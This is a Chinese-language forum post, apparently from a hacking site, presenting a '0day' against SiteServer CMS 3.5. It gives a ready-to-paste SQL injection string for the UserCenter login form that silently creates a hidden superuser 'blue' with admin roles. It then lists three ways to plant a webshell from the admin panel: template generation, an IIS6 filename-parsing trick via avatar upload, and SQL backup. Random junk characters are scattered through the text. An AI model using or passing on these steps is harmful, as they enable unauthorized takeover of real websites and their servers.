SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版

stieserver官网:www.siteserver.cn

+ h/ z7 ?3 E, P+ O2 u) z

3 \2 a" T. O$ {( U# OEXP:
. K- l5 M. f! A2 A) W
7 Z. P7 v! Z1 a% i2 x2 P7 W+ {' f直接访问UserCenter/login.aspx
9 I; v  [0 ^  z* a6 p/ z8 l! C
) N! r, t( F) q
. p& y; `* _9 a3 V# p$ P
用户名处输入：

9 P8 Q$ A; i% u9 e6 A" S123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
* }+ Z& T0 z; O# N& C+ S( u5 G


$ A# u& G- G, i8 H  n密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
( C9 n1 y) Y' s5 @
0 }1 z4 E& e" H$ v. o
! z. a& z9 q+ M! }
之后再访问后台SiteServer/login.aspx用插入的用户登陆
& ^0 ]# x0 G# P) L# T, ]3 L' e
, I2 ]0 x  G( P" @( \1 n4 f* T6 n
* ^  n" m' w, V+ R  q
后台拿webshell的三种方法：
, k9 _/ w0 w0 |$ K1 \' G7 n
一、
+ |& j( `$ p1 p! r/ N
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
3 c9 ^0 h. _/ ^6 ]% x+ \  F
- T' D1 n' W8 Y' C7 J二、

成员权限-》添加用户-》用户名为：1.asp
' N4 b* r+ y+ G9 `- m: G: c9 R
( ]# f% W% t5 A1 \& ]1 a+ }http://127.0.0.1/usercenter/
5 w' w: M  M& _# ~
, H8 F# ?0 h: u: |- I' m用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell

（ps：后台添加用户时不会验证是否含有非法字符）

. k# \5 n  ~: C0 \5 y+ {4 h$ q三、

! h" W" w- J% w* y; C系统工具-》实用工具-》机器参数查看
2 |9 `" a9 u) s: U" h- ~! u2 m: {可以看到数据库类型、名称，WEB路径
* A$ E5 b' M4 m9 Q, b, G$ v* _
系统工具-》数据库工具-》SQL语句查询
, S1 H* _" O! }3 j7 K2 Z1 T, i这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。

- C/ s7 [) N5 y) d- R5 w